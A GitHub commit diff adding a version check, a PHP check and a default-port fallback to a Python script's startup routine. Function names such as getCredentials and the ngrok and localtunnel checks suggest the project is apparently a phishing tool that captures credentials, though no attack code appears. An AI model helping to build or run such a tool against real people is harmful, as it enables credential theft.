Added Version Check.

This commit is contained in:
AnonUD4Y 2020-01-19 14:03:08 +00:00 committed by GitHub
parent 8eedd6686c
commit 5c4f69e5c7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -22,6 +22,8 @@ checkPermissions()
installGetText()
languageSelector()
checkConnection()
verCheck()
checkPHP()
checkLocalxpose()
checkNgrok()
checkOpenport()
@ -31,7 +33,6 @@ checkLT()
ifSettingsNotExists()
readConfig()
if __name__ == "__main__":
try:
runMainMenu()
@ -52,5 +53,6 @@ if __name__ == "__main__":
getCredentials(port)
except KeyboardInterrupt:
emailPrompt3(port)
port = '8080' # When Keyword Interrupt Occurs before defining Port by User. Script will use 8080 port.(Just To Remove Exception Errors)
endMessage(port)
exit()